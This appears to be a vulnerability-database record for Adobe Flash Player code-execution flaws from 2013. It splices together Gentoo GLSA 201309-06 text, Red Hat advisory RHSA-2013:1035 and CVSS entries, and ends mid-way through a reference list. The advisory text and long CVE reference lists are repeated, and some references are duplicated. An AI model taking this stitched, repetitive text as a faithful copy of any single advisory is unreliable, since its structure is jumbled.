[ 60 ] CVE-2012-5678 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5678
[ 61 ] CVE-2013-0504 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0504
[ 62 ] CVE-2013-0630 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0630
[ 63 ] CVE-2013-0633 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0633
[ 64 ] CVE-2013-0634 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0634
[ 65 ] CVE-2013-0637 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0637
[ 66 ] CVE-2013-0638 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0638
[ 67 ] CVE-2013-0639 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0639
[ 68 ] CVE-2013-0642 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0642
[ 69 ] CVE-2013-0643 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0643
[ 70 ] CVE-2013-0644 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0644
[ 71 ] CVE-2013-0645 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0645
[ 72 ] CVE-2013-0646 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0646
[ 73 ] CVE-2013-0647 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0647
[ 74 ] CVE-2013-0648 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0648
[ 75 ] CVE-2013-0649 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0649
[ 76 ] CVE-2013-0650 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0650
[ 77 ] CVE-2013-1365 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1365
[ 78 ] CVE-2013-1366 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1366
[ 79 ] CVE-2013-1367 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1367
[ 80 ] CVE-2013-1368 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1368
[ 81 ] CVE-2013-1369 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1369
[ 82 ] CVE-2013-1370 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1370
[ 83 ] CVE-2013-1371 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1371
[ 84 ] CVE-2013-1372 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1372
[ 85 ] CVE-2013-1373 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1373
[ 86 ] CVE-2013-1374 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1374
[ 87 ] CVE-2013-1375 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1375
[ 88 ] CVE-2013-1378 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1378
[ 89 ] CVE-2013-1379 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1379
[ 90 ] CVE-2013-1380 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1380
[ 91 ] CVE-2013-2555 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2555
[ 92 ] CVE-2013-2728 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2728
[ 93 ] CVE-2013-3343 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3343
[ 94 ] CVE-2013-3344 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3344
[ 95 ] CVE-2013-3345 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3345
[ 96 ] CVE-2013-3347 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3347
[ 97 ] CVE-2013-3361 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3361
[ 98 ] CVE-2013-3362 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3362
[ 99 ] CVE-2013-3363 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3363
[ 100 ] CVE-2013-5324 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5324

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-201309-06.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.

License
=======

Copyright 2013 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Critical: flash-plugin security update Advisory ID: RHSA-2013:1035-01 Product: Red Hat Enterprise Linux Supplementary Advisory URL: https://rhn.redhat.com/errata/RHSA-2013-1035.html Issue date: 2013-07-10 CVE Names: CVE-2013-3344 CVE-2013-3345 CVE-2013-3347 ===================================================================== 1. Summary: An updated Adobe Flash Player package that fixes three security issues is now available for Red Hat Enterprise Linux 5 and 6 Supplementary. The Red Hat Security Response Team has rated this update as having critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64 3. Description: The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in. These vulnerabilities are detailed in the Adobe Security bulletin APSB13-17, listed in the References section. Specially-crafted SWF content could cause flash-plugin to crash or, potentially, execute arbitrary code when a victim loads a page containing the malicious SWF content. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. This update is available via the Red Hat Network. 
Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/site/articles/11258 5. Bugs fixed (http://bugzilla.redhat.com/): 982749 - CVE-2013-3344 CVE-2013-3345 CVE-2013-3347 flash-plugin: Multiple code execution flaws (APSB13-17) 6. Package List: Red Hat Enterprise Linux Desktop Supplementary (v. 5): i386: flash-plugin-11.2.202.297-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.297-1.el5.i386.rpm Red Hat Enterprise Linux Server Supplementary (v. 5): i386: flash-plugin-11.2.202.297-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.297-1.el5.i386.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 6): i386: flash-plugin-11.2.202.297-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.297-1.el6.i686.rpm Red Hat Enterprise Linux Server Supplementary (v. 6): i386: flash-plugin-11.2.202.297-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.297-1.el6.i686.rpm Red Hat Enterprise Linux Workstation Supplementary (v. 6): i386: flash-plugin-11.2.202.297-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.297-1.el6.i686.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2013-3344.html https://www.redhat.com/security/data/cve/CVE-2013-3345.html https://www.redhat.com/security/data/cve/CVE-2013-3347.html https://access.redhat.com/security/updates/classification/#critical http://www.adobe.com/support/security/bulletins/apsb13-17.html 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2013 Red Hat, Inc. 
VAR-201307-0191 CVE-2013-3344 Adobe Flash Player Heap-based buffer overflow vulnerability CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
Heap-based buffer overflow in Adobe Flash Player before 11.7.700.232 and 11.8.x before 11.8.800.94 on Windows and Mac OS X, before 11.2.202.297 on Linux, before 11.1.111.64 on Android 2.x and 3.x, and before 11.1.115.69 on Android 4.x allows attackers to execute arbitrary code via unspecified vectors. Note: This issue was previously covered in BID 61038 (Adobe Flash Player APSB13-17 Multiple Remote Code Execution Vulnerabilities), but has been moved to its own record for better documentation. Failed attempts will likely cause a denial-of-service condition. The product enables viewing of applications, content and video across screens and browsers. Background ========== The Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. Please review the CVE identifiers referenced below for details. Impact ====== A remote attacker could entice a user to open specially crafted SWF content, possibly resulting in execution of arbitrary code with the privileges of the process or a Denial of Service condition. Furthermore, a remote attacker may be able to bypass access restrictions. Workaround ========== There is no known workaround at this time. 
Resolution ========== All Adobe Flash Player users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.310" References ========== [ 1 ] CVE-2012-5248 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5248 [ 2 ] CVE-2012-5248 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5248 [ 3 ] CVE-2012-5249 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5249 [ 4 ] CVE-2012-5249 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5249 [ 5 ] CVE-2012-5250 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5250 [ 6 ] CVE-2012-5250 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5250 [ 7 ] CVE-2012-5251 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5251 [ 8 ] CVE-2012-5251 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5251 [ 9 ] CVE-2012-5252 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5252 [ 10 ] CVE-2012-5252 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5252 [ 11 ] CVE-2012-5253 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5253 [ 12 ] CVE-2012-5253 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5253 [ 13 ] CVE-2012-5254 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5254 [ 14 ] CVE-2012-5254 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5254 [ 15 ] CVE-2012-5255 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5255 [ 16 ] CVE-2012-5255 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5255 [ 17 ] CVE-2012-5256 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5256 [ 18 ] CVE-2012-5256 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5256 [ 19 ] CVE-2012-5257 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5257 [ 20 ] CVE-2012-5257 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5257 [ 21 ] CVE-2012-5258 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5258 [ 22 ] CVE-2012-5258 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5258 [ 23 ] CVE-2012-5259 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5259 [ 24 ] CVE-2012-5259 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5259 [ 25 ] CVE-2012-5260 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5260 [ 26 ] CVE-2012-5260 
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5260 [ 27 ] CVE-2012-5261 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5261 [ 28 ] CVE-2012-5261 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5261 [ 29 ] CVE-2012-5262 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5262 [ 30 ] CVE-2012-5262 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5262 [ 31 ] CVE-2012-5263 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5263 [ 32 ] CVE-2012-5263 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5263 [ 33 ] CVE-2012-5264 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5264 [ 34 ] CVE-2012-5264 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5264 [ 35 ] CVE-2012-5265 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5265 [ 36 ] CVE-2012-5265 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5265 [ 37 ] CVE-2012-5266 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5266 [ 38 ] CVE-2012-5266 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5266 [ 39 ] CVE-2012-5267 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5267 [ 40 ] CVE-2012-5267 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5267 [ 41 ] CVE-2012-5268 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5268 [ 42 ] CVE-2012-5268 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5268 [ 43 ] CVE-2012-5269 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5269 [ 44 ] CVE-2012-5269 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5269 [ 45 ] CVE-2012-5270 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5270 [ 46 ] CVE-2012-5270 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5270 [ 47 ] CVE-2012-5271 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5271 [ 48 ] CVE-2012-5271 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5271 [ 49 ] CVE-2012-5272 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5272 [ 50 ] CVE-2012-5272 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5272 [ 51 ] CVE-2012-5274 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5274 [ 52 ] CVE-2012-5275 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5275 [ 53 ] CVE-2012-5276 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5276 [ 54 ] CVE-2012-5277 
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5277 [ 55 ] CVE-2012-5278 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5278 [ 56 ] CVE-2012-5279 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5279 [ 57 ] CVE-2012-5280 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5280 [ 58 ] CVE-2012-5676 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5676 [ 59 ] CVE-2012-5677 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5677 [ 60 ] CVE-2012-5678 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5678 [ 61 ] CVE-2013-0504 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0504 [ 62 ] CVE-2013-0630 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0630 [ 63 ] CVE-2013-0633 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0633 [ 64 ] CVE-2013-0634 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0634 [ 65 ] CVE-2013-0637 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0637 [ 66 ] CVE-2013-0638 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0638 [ 67 ] CVE-2013-0639 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0639 [ 68 ] CVE-2013-0642 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0642 [ 69 ] CVE-2013-0643 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0643 [ 70 ] CVE-2013-0644 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0644 [ 71 ] CVE-2013-0645 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0645 [ 72 ] CVE-2013-0646 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0646 [ 73 ] CVE-2013-0647 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0647 [ 74 ] CVE-2013-0648 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0648 [ 75 ] CVE-2013-0649 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0649 [ 76 ] CVE-2013-0650 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0650 [ 77 ] CVE-2013-1365 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1365 [ 78 ] CVE-2013-1366 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1366 [ 79 ] CVE-2013-1367 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1367 [ 80 ] CVE-2013-1368 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1368 [ 81 ] CVE-2013-1369 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1369 [ 82 ] CVE-2013-1370 
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1370 [ 83 ] CVE-2013-1371 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1371 [ 84 ] CVE-2013-1372 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1372 [ 85 ] CVE-2013-1373 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1373 [ 86 ] CVE-2013-1374 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1374 [ 87 ] CVE-2013-1375 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1375 [ 88 ] CVE-2013-1378 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1378 [ 89 ] CVE-2013-1379 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1379 [ 90 ] CVE-2013-1380 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1380 [ 91 ] CVE-2013-2555 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2555 [ 92 ] CVE-2013-2728 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2728 [ 93 ] CVE-2013-3343 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3343 [ 94 ] CVE-2013-3344 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3344 [ 95 ] CVE-2013-3345 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3345 [ 96 ] CVE-2013-3347 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3347 [ 97 ] CVE-2013-3361 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3361 [ 98 ] CVE-2013-3362 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3362 [ 99 ] CVE-2013-3363 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3363 [ 100 ] CVE-2013-5324 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5324 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201309-06.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2013 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. 
http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Critical: flash-plugin security update Advisory ID: RHSA-2013:1035-01 Product: Red Hat Enterprise Linux Supplementary Advisory URL: https://rhn.redhat.com/errata/RHSA-2013-1035.html Issue date: 2013-07-10 CVE Names: CVE-2013-3344 CVE-2013-3345 CVE-2013-3347 ===================================================================== 1. Summary: An updated Adobe Flash Player package that fixes three security issues is now available for Red Hat Enterprise Linux 5 and 6 Supplementary. The Red Hat Security Response Team has rated this update as having critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64 3. These vulnerabilities are detailed in the Adobe Security bulletin APSB13-17, listed in the References section. Specially-crafted SWF content could cause flash-plugin to crash or, potentially, execute arbitrary code when a victim loads a page containing the malicious SWF content. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/site/articles/11258 5. 
Bugs fixed (http://bugzilla.redhat.com/): 982749 - CVE-2013-3344 CVE-2013-3345 CVE-2013-3347 flash-plugin: Multiple code execution flaws (APSB13-17) 6. Package List: Red Hat Enterprise Linux Desktop Supplementary (v. 5): i386: flash-plugin-11.2.202.297-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.297-1.el5.i386.rpm Red Hat Enterprise Linux Server Supplementary (v. 5): i386: flash-plugin-11.2.202.297-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.297-1.el5.i386.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 6): i386: flash-plugin-11.2.202.297-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.297-1.el6.i686.rpm Red Hat Enterprise Linux Server Supplementary (v. 6): i386: flash-plugin-11.2.202.297-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.297-1.el6.i686.rpm Red Hat Enterprise Linux Workstation Supplementary (v. 6): i386: flash-plugin-11.2.202.297-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.297-1.el6.i686.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2013-3344.html https://www.redhat.com/security/data/cve/CVE-2013-3345.html https://www.redhat.com/security/data/cve/CVE-2013-3347.html https://access.redhat.com/security/updates/classification/#critical http://www.adobe.com/support/security/bulletins/apsb13-17.html 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2013 Red Hat, Inc.
VAR-201307-0194 CVE-2013-3345 Adobe Flash Player Vulnerable to arbitrary code execution CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
Adobe Flash Player before 11.7.700.232 and 11.8.x before 11.8.800.94 on Windows and Mac OS X, before 11.2.202.297 on Linux, before 11.1.111.64 on Android 2.x and 3.x, and before 11.1.115.69 on Android 4.x allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors. Adobe Flash Player is prone to an unspecified memory-corruption vulnerability. Note: This issue was previously covered in BID 61038 (Adobe Flash Player APSB13-17 Multiple Remote Code Execution Vulnerabilities), but has been moved to its own record for better documentation. Attackers can exploit this issue to execute arbitrary code within the context of the user running the affected application. Failed attempts will likely cause a denial-of-service condition. The product enables viewing of applications, content and video across screens and browsers. Background ========== The Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. Please review the CVE identifiers referenced below for details. Impact ====== A remote attacker could entice a user to open specially crafted SWF content, possibly resulting in execution of arbitrary code with the privileges of the process or a Denial of Service condition. Furthermore, a remote attacker may be able to bypass access restrictions. Workaround ========== There is no known workaround at this time. 
Resolution ========== All Adobe Flash Player users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.310" References ========== [ 1 ] CVE-2012-5248 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5248 [ 2 ] CVE-2012-5248 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5248 [ 3 ] CVE-2012-5249 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5249 [ 4 ] CVE-2012-5249 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5249 [ 5 ] CVE-2012-5250 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5250 [ 6 ] CVE-2012-5250 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5250 [ 7 ] CVE-2012-5251 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5251 [ 8 ] CVE-2012-5251 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5251 [ 9 ] CVE-2012-5252 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5252 [ 10 ] CVE-2012-5252 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5252 [ 11 ] CVE-2012-5253 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5253 [ 12 ] CVE-2012-5253 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5253 [ 13 ] CVE-2012-5254 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5254 [ 14 ] CVE-2012-5254 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5254 [ 15 ] CVE-2012-5255 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5255 [ 16 ] CVE-2012-5255 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5255 [ 17 ] CVE-2012-5256 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5256 [ 18 ] CVE-2012-5256 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5256 [ 19 ] CVE-2012-5257 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5257 [ 20 ] CVE-2012-5257 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5257 [ 21 ] CVE-2012-5258 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5258 [ 22 ] CVE-2012-5258 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5258 [ 23 ] CVE-2012-5259 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5259 [ 24 ] CVE-2012-5259 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5259 [ 25 ] CVE-2012-5260 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5260 [ 26 ] CVE-2012-5260 
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5260 [ 27 ] CVE-2012-5261 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5261 [ 28 ] CVE-2012-5261 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5261 [ 29 ] CVE-2012-5262 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5262 [ 30 ] CVE-2012-5262 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5262 [ 31 ] CVE-2012-5263 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5263 [ 32 ] CVE-2012-5263 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5263 [ 33 ] CVE-2012-5264 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5264 [ 34 ] CVE-2012-5264 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5264 [ 35 ] CVE-2012-5265 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5265 [ 36 ] CVE-2012-5265 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5265 [ 37 ] CVE-2012-5266 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5266 [ 38 ] CVE-2012-5266 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5266 [ 39 ] CVE-2012-5267 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5267 [ 40 ] CVE-2012-5267 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5267 [ 41 ] CVE-2012-5268 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5268 [ 42 ] CVE-2012-5268 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5268 [ 43 ] CVE-2012-5269 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5269 [ 44 ] CVE-2012-5269 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5269 [ 45 ] CVE-2012-5270 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5270 [ 46 ] CVE-2012-5270 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5270 [ 47 ] CVE-2012-5271 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5271 [ 48 ] CVE-2012-5271 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5271 [ 49 ] CVE-2012-5272 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5272 [ 50 ] CVE-2012-5272 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5272 [ 51 ] CVE-2012-5274 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5274 [ 52 ] CVE-2012-5275 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5275 [ 53 ] CVE-2012-5276 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5276 [ 54 ] CVE-2012-5277 
